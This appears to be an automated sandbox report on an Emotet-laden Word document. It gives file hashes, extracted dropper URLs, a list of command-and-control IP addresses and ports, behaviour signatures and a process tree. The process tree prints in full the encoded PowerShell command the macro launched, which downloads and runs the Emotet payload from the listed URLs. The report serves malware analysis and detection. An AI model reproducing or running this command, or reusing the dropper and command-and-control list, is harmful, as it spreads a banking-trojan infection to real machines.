Analysis

  • max time kernel
    49s
  • max time network
    30s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    27-10-2020 15:25

General

  • Target

    emotet_e1_63ba733a424e0e8faca60800df859696e15df38315049068bc30c559f9230b5b_2020-10-27__152327744649._fpx.doc

  • Size

    164KB

  • MD5

    98c8436a64207c603fe83b9cf018db0a

  • SHA1

    2b6c534d72f69ca4cd92660774b3b3b9becbacdb

  • SHA256

    63ba733a424e0e8faca60800df859696e15df38315049068bc30c559f9230b5b

  • SHA512

    07c5b2df22d26a5b66555becf30719bafab7ac3841488d97bc73bbf18ef99a8bdcbef816d7768e2b9874b44d59107257c442fed2c8c954457dc064503f15d553

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://hashilife.com/sitepage/GY/

exe.dropper

http://anjia-ceramics.com/aliner-camper/K/

exe.dropper

https://monicasharma.info/reviewl/i/

exe.dropper

http://adidasyeezy.store/welph/m/

exe.dropper

http://econews.treegle.org/how-to/2V/

exe.dropper

http://quicktowtowing.com/wp-content/mu-plugins/uMM/

exe.dropper

https://timsonntag.com/cgi-bin/g/

Extracted

Family

emotet

Botnet

Epoch1

C2

45.16.226.117:443

104.131.92.244:8080

70.39.251.94:8080

87.230.25.43:8080

186.189.249.2:80

209.236.123.42:8080

5.196.35.138:7080

45.33.77.42:8080

46.43.2.95:8080

24.135.69.146:80

103.236.179.162:80

190.92.122.226:80

201.71.228.86:80

68.183.170.114:8080

183.176.82.231:80

168.197.45.36:80

152.169.22.67:80

111.67.12.221:8080

51.75.33.127:80

186.70.127.199:8090

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_63ba733a424e0e8faca60800df859696e15df38315049068bc30c559f9230b5b_2020-10-27__152327744649._fpx.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3796
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD IAAkADYANAAyAHcANQAgAD0AIAAgAFsAdAB5AHAARQBdACgAIgB7ADUAfQB7ADQAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADEAfQAiACAALQBGACcASQAnACwAJwBPAFIAeQAnACwAJwAuAGQAaQByAEUAYwBUACcALAAnAE8AJwAsACcAeQBzAHQAZQBtAC4AJwAsACcAcwAnACkAOwAgAFMARQBUAC0ASQBUAEUAbQAgAFYAYQByAGkAYQBiAGwAZQA6AEcAUgBRAG8AIAAgACgAWwBUAFkAcABlAF0AKAAiAHsAMwB9AHsAMgB9AHsAMQB9AHsAMAB9AHsANAB9AHsANQB9ACIAIAAtAGYAJwBUAC4AUwBFAFIAdgBJAGMARQBQAE8ASQBuAHQATQAnACwAJwBFACcALAAnAFQARQBtAC4ATgAnACwAJwBTAHkAUwAnACwAJwBhAE4AYQAnACwAJwBHAGUAUgAnACkAIAAgACkAIAA7ACQAQgBjAGUAeABjAG4AbgA9ACgAKAAnAFoAdQAnACsAJwBxADUAJwApACsAKAAnAHMAZAAnACsAJwBfACcAKQApADsAJABaAHEAbgBmAGEAOQA0AD0AJABWAF8AaQBqAGYANgByACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADMAcgBrAGIANwB3ADsAJABSAHkAZAAwADUAZwA3AD0AKAAnAFoAJwArACgAJwBmAHMAbAAnACsAJwBtAGgAJwArACcANQAnACkAKQA7ACAAIAAoACAAVgBhAFIAaQBhAGIATABFACAAIAAoACcANgA0ACcAKwAnADIAVwA1ACcAKQAgACAALQB2AEEAbAB1AEUAbwBuACAAKQA6ADoAIgBjAHIAZQBBAHQAZQBkAEkAYABSAEUAQwBUAGAAbwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQAnACsAJwBXAG4AdwByADYAMwBhAHsAMAB9ACcAKwAnAEoAJwArACcAbQAnACsAJwBrAHkAJwArACgAJwB4ACcAKwAnAGwAMwAnACkAKwAnAHsAMAB9ACcAKQAgAC0ARgAgAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAEkAdAA1AHgAZAB0AHQAPQAoACgAJwBQACcAKwAnAHAAeABsACcAKQArACgAJwA4ACcAKwAnAGMAcAAnACkAKQA7ACAAIAAoAGcAZQB0AC0AVgBhAHIAaQBhAEIAbABFACAAIABHAHIAcQBPACAAIAAtAHYAQQBMAHUARQBPAE4AIAAgACkAOgA6ACIAUwBgAGUAYABDAFUAUgBpAHQAWQBwAFIATwB0AE8AYwBvAEwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAxACcAKQArACcAMgAnACkAOwAkAFkAMgBmADUAYQBiADkAPQAoACgAJwBDADEAagAnACsAJwBhACcAKQArACgAJwBtACcAKwAnAGcAbgAnACkAKQA7ACQAUgB4ADkAYwB3ADMAbAAgAD0AIAAoACgAJwBZACcAKwAnAGgAOQAnACkAKwAoACcAcwBiACcAKwAnAF8AdwAnACsAJwBmAGYAJwApACkAOwAkAEoAbwB0AHYAdwA4ADIAPQAoACgAJwBKAHYAJwArACcAYgAnACkAKwAnAF8AJwArACgAJwBqACcAKwAnAGsAdwAnACkAKQA7ACQATgBuAGoAdAA2AHAAYwA9ACgAJwBKAHoAJwArACgAJwBmACcAKwAnADgAYgAnACkAKwAnADAAZgAnACkAOwAkAFUAcwA0AHAAagA3AGkAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBXAG4AJwArACgAJwB3AHIAJwArACcANgAnACkAKwAnADMAYQB7ACcAKwAnADAAJwArACcAfQBKACcAKwAnAG0AawB5AHgAbAAzAHsAMAB9ACcAKQAgACAALQBmACAAWwBjAEgAQQByAF0AOQAyACkAKwAkAFIAeAA5AGMAdwAzAGwAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFMAZQB6AHQAZgB0AGUAPQAoACcASAA5ACcAKwAnADQAJwArACgAJwAzADIAJwArACcAMAAwACcAKQApADsAJABDAGIAbABvADAAeQBoAD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlACcAKwAnAGMAdAAnACkAIABOAEUAdAAuAFcAZQBCAGMAbABJAEUATgBUADsAJABGAHcAbQAwAGsAdQBvAD0AKAAoACcAaAB0AHQAcAAnACsAJwA6ACcAKQArACcAWwAgACcAKwAoACcAdwBlACcAKwAnACAAXQBbACcAKQArACcAIAAnACsAKAAnAHcAZQAgAF0AaABhACcAKwAnAHMAJwArACcAaAAnACkAKwAnAGkAJwArACgAJwBsAGkAZgAnACsAJwBlAC4AYwBvAG0AWwAgACcAKwAnAHcAZQAgAF0AcwAnACsAJwBpAHQAJwApACsAKAAnAGUAcAAnACsAJwBhACcAKwAnAGcAZQBbACcAKQArACcAIAAnACsAJwB3ACcAKwAnAGUAJwArACgAJwAgAF0AJwArACcARwBZAFsAJwApACsAJwAgACcAKwAoACcAdwAnACsAJwBlACAAXQBAAGgAJwApACsAKAAnAHQAdABwACcAKwAnADoAWwAnACkAKwAnACAAJwArACcAdwAnACsAKAAnAGUAIAAnACsAJwBdAFsAIAAnACkAKwAoACcAdwAnACsAJwBlACAAJwApACsAJwBdAGEAJwArACcAbgAnACsAKAAnAGoAaQAnACsAJwBhACcAKQArACgAJwAtACcAKwAnAGMAZQAnACkAKwAnAHIAJwArACgAJwBhAG0AJwArACcAaQAnACkAKwAnAGMAJwArACcAcwAnACsAKAAnAC4AYwAnACsAJwBvACcAKwAnAG0AWwAgAHcAZQAgAF0AJwApACsAKAAnAGEAJwArACcAbABpACcAKQArACgAJwBuAGUAcgAnACsAJwAtAGMAJwApACsAKAAnAGEAbQBwAGUAcgAnACsAJwBbACcAKQArACcAIAAnACsAKAAnAHcAZQAgAF0ASwBbACcAKwAnACAAJwArACcAdwBlACAAJwApACsAJwBdACcAKwAoACcAQABoACcAKwAnAHQAdAAnACkAKwAnAHAAJwArACgAJwBzACcAKwAnADoAWwAnACkAKwAnACAAJwArACgAJwB3AGUAIAAnACsAJwBdAFsAIAAnACkAKwAnAHcAJwArACgAJwBlACcAKwAnACAAXQBtACcAKQArACcAbwAnACsAJwBuAGkAJwArACcAYwAnACsAKAAnAGEAcwAnACsAJwBoACcAKQArACcAYQByACcAKwAnAG0AYQAnACsAKAAnAC4AaQAnACsAJwBuAGYAJwApACsAJwBvACcAKwAoACcAWwAgACcAKwAnAHcAZQAgAF0AcgBlAHYAaQBlAHcAJwArACcAbAAnACkAKwAnAFsAIAAnACsAKAAnAHcAZQAnACsAJwAgACcAKQArACgAJwBdAGkAJwArACcAWwAgACcAKQArACcAdwBlACcAKwAnACAAXQAnACsAJwBAACcAKwAoACcAaAB0ACcAKwAnAHQAcAAnACkAKwAnADoAWwAnACsAKAAnACAAdwAnACsAJwBlACcAKQArACgAJwAgACcAKwAnAF0AWwAgACcAKQArACcAdwAnACsAKAAnAGUAJwArACcAIABdAGEAJwApACsAKAAnAGQAaQBkAGEAJwArACcAcwAnACkAKwAnAHkAJwArACgAJwBlAGUAJwArACcAegB5ACcAKwAnAC4AcwAnACkAKwAoACcAdABvACcAKwAnAHIAJwApACsAJwBlAFsAJwArACgAJwAgACcAKwAnAHcAZQAnACkAKwAoACcAIABdACcAKwAnAHcAZQAnACkAKwAoACcAbAAnACsAJwBwAGgAWwAnACkAKwAnACAAJwArACcAdwBlACcAKwAoACcAIAAnACsAJwBdAG0AJwApACsAJwBbACAAJwArACcAdwAnACsAKAAnAGUAJwArACcAIAAnACsAJwBdAEAAaAB0AHQAcAAnACsAJwA6ACcAKQArACcAWwAnACsAJwAgAHcAJwArACcAZQAgACcAKwAoACcAXQBbACAAdwBlACcAKwAnACAAXQAnACkAKwAoACcAZQBjAG8AbgAnACsAJwBlACcAKwAnAHcAcwAuAHQAJwApACsAJwByAGUAJwArACgAJwBlAGcAbAAnACsAJwBlAC4AJwApACsAKAAnAG8AcgAnACsAJwBnAFsAJwApACsAJwAgACcAKwAoACcAdwAnACsAJwBlACAAJwApACsAJwBdAGgAJwArACcAbwAnACsAKAAnAHcALQB0ACcAKwAnAG8AWwAnACkAKwAnACAAJwArACcAdwBlACcAKwAoACcAIABdADIAJwArACcAVgBbACcAKwAnACAAdwBlACAAJwApACsAJwBdACcAKwAoACcAQABoACcAKwAnAHQAJwApACsAJwB0ACcAKwAnAHAAOgAnACsAKAAnAFsAJwArACcAIAB3ACcAKQArACcAZQAgACcAKwAoACcAXQAnACsAJwBbACAAJwApACsAKAAnAHcAJwArACcAZQAgACcAKQArACgAJwBdAHEAJwArACcAdQBpAGMAJwApACsAJwBrAHQAJwArACcAbwAnACsAKAAnAHcAdAAnACsAJwBvAHcAJwApACsAJwBpACcAKwAnAG4AZwAnACsAKAAnAC4AJwArACcAYwBvAG0AWwAgAHcAZQAnACsAJwAgAF0AdwBwACcAKQArACcALQAnACsAKAAnAGMAbwBuAHQAZQAnACsAJwBuACcAKwAnAHQAWwAgAHcAZQAnACkAKwAnACAAXQAnACsAJwBtACcAKwAnAHUAJwArACcALQBwACcAKwAoACcAbAB1ACcAKwAnAGcAaQBuACcAKQArACgAJwBzAFsAIAB3AGUAJwArACcAIABdACcAKQArACgAJwB1ACcAKwAnAE0ATQAnACkAKwAnAFsAJwArACcAIAAnACsAJwB3ACcAKwAnAGUAJwArACgAJwAgAF0AJwArACcAQABoACcAKQArACgAJwB0AHQAcAAnACsAJwBzADoAWwAnACsAJwAgAHcAZQAnACkAKwAoACcAIAAnACsAJwBdAFsAIAB3AGUAIABdAHQAJwArACcAaQAnACkAKwAoACcAbQBzAG8AJwArACcAbgBuAHQAJwApACsAKAAnAGEAZwAuACcAKwAnAGMAJwApACsAJwBvAG0AJwArACgAJwBbACAAdwAnACsAJwBlACcAKQArACgAJwAgAF0AYwAnACsAJwBnACcAKQArACcAaQAnACsAKAAnAC0AYgBpAG4AJwArACcAWwAgAHcAZQAnACsAJwAgACcAKwAnAF0AJwApACsAKAAnAGcAJwArACcAWwAgACcAKQArACgAJwB3AGUAJwArACcAIABdACcAKQApAC4AIgByAEUAUABsAGAAQQBDAEUAIgAoACgAJwBbACAAJwArACgAJwB3ACcAKwAnAGUAIABdACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACcAZgBzACcAKQBbADAAXQApAC4AIgBTAHAAYABsAGkAVAAiACgAJABYADgAcQBpADgAdwBiACAAKwAgACQAWgBxAG4AZgBhADkANAAgACsAIAAkAEkAeQBpADkAMwA1AG4AKQA7ACQATABiAGsAZgB3AGQAXwA9ACgAJwBHADgAJwArACgAJwBqADgAJwArACcAeAAnACkAKwAnAGsAZQAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAbgBvAHYAeABmAGgAIABpAG4AIAAkAEYAdwBtADAAawB1AG8AKQB7AHQAcgB5AHsAJABDAGIAbABvADAAeQBoAC4AIgBkAG8AYABXAE4ATABvAGAAQQBkAGYASQBMAGUAIgAoACQATABuAG8AdgB4AGYAaAAsACAAJABVAHMANABwAGoANwBpACkAOwAkAFQAcwBhAGUAdAA4AGUAPQAoACgAJwBCACcAKwAnADMAaAAnACkAKwAoACcAcgAnACsAJwBrAGcAJwApACsAJwB1ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABVAHMANABwAGoANwBpACkALgAiAGwARQBOAGAAZwBUAEgAIgAgAC0AZwBlACAAMwA4ADgANwA3ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwAnACsAKAAnAGkAbgAnACsAJwAzADIAXwBQACcAKQArACgAJwByAG8AJwArACcAYwAnACkAKwAoACcAZQAnACsAJwBzAHMAJwApACkAKQAuACIAQwByAGUAYABBAFQAZQAiACgAJABVAHMANABwAGoANwBpACkAOwAkAEsAbQB6AHkANABiADQAPQAoACcATABfACcAKwAnAF8AJwArACgAJwBuAGYAJwArACcAbABiACcAKQApADsAYgByAGUAYQBrADsAJABWAGcAawA1AGkANwB0AD0AKAAnAEYAJwArACgAJwBjADYAOAAnACsAJwB0AHoAYwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVgBtAGgAOQBxADIAOQA9ACgAJwBGAGkAJwArACcAYwA5ACcAKwAoACcAZQAxACcAKwAnADkAJwApACkA
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1636
  • C:\Users\Admin\Wnwr63a\Jmkyxl3\Yh9sb_wff.exe
    C:\Users\Admin\Wnwr63a\Jmkyxl3\Yh9sb_wff.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:2948
    • C:\Windows\SysWOW64\msjint40\cfmifsproxy.exe
      "C:\Windows\SysWOW64\msjint40\cfmifsproxy.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1240

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\Wnwr63a\Jmkyxl3\Yh9sb_wff.exe
    MD5

    2aac15140491abb55dbfd5e7d954d306

    SHA1

    0b2b99b190fc91bfd5b9796d981fecfbb59b2262

    SHA256

    0c0b8c63c1842128e8fddbd4ca752817be5790e5de3cd078d8788bdf8b35bae3

    SHA512

    7a2cddb40cd9b3391bf9429863baa2169aee057a049f65176cdacd234af0a1ee9d0993877d8c8cf0616fa32ea12b9f8cb4a244b3dc54bdc2c3a54bdf47bd1c47

  • C:\Users\Admin\Wnwr63a\Jmkyxl3\Yh9sb_wff.exe
    MD5

    2aac15140491abb55dbfd5e7d954d306

    SHA1

    0b2b99b190fc91bfd5b9796d981fecfbb59b2262

    SHA256

    0c0b8c63c1842128e8fddbd4ca752817be5790e5de3cd078d8788bdf8b35bae3

    SHA512

    7a2cddb40cd9b3391bf9429863baa2169aee057a049f65176cdacd234af0a1ee9d0993877d8c8cf0616fa32ea12b9f8cb4a244b3dc54bdc2c3a54bdf47bd1c47

  • C:\Windows\SysWOW64\msjint40\cfmifsproxy.exe
    MD5

    2aac15140491abb55dbfd5e7d954d306

    SHA1

    0b2b99b190fc91bfd5b9796d981fecfbb59b2262

    SHA256

    0c0b8c63c1842128e8fddbd4ca752817be5790e5de3cd078d8788bdf8b35bae3

    SHA512

    7a2cddb40cd9b3391bf9429863baa2169aee057a049f65176cdacd234af0a1ee9d0993877d8c8cf0616fa32ea12b9f8cb4a244b3dc54bdc2c3a54bdf47bd1c47

  • memory/1240-16-0x00000000020C0000-0x00000000020DE000-memory.dmp
    Filesize

    120KB

  • memory/1240-15-0x00000000020A0000-0x00000000020C0000-memory.dmp
    Filesize

    128KB

  • memory/1240-13-0x0000000000000000-mapping.dmp
  • memory/1636-6-0x00007FFF26B90000-0x00007FFF2757C000-memory.dmp
    Filesize

    9.9MB

  • memory/1636-7-0x0000021AAAB00000-0x0000021AAAB01000-memory.dmp
    Filesize

    4KB

  • memory/1636-8-0x0000021AAACB0000-0x0000021AAACB1000-memory.dmp
    Filesize

    4KB

  • memory/2948-12-0x0000000000520000-0x000000000053E000-memory.dmp
    Filesize

    120KB

  • memory/2948-11-0x0000000000500000-0x0000000000520000-memory.dmp
    Filesize

    128KB

  • memory/3796-5-0x000001CD4D6B8000-0x000001CD4D6BD000-memory.dmp
    Filesize

    20KB

  • memory/3796-0-0x00007FFF2E5F0000-0x00007FFF2EC27000-memory.dmp
    Filesize

    6.2MB

  • memory/3796-4-0x000001CD4D6B8000-0x000001CD4D6BD000-memory.dmp
    Filesize

    20KB

  • memory/3796-3-0x000001CD4D6B8000-0x000001CD4D6BD000-memory.dmp
    Filesize

    20KB

  • memory/3796-2-0x000001CD4D6B4000-0x000001CD4D6B8000-memory.dmp
    Filesize

    16KB

  • memory/3796-1-0x000001CD4D481000-0x000001CD4D4CE000-memory.dmp
    Filesize

    308KB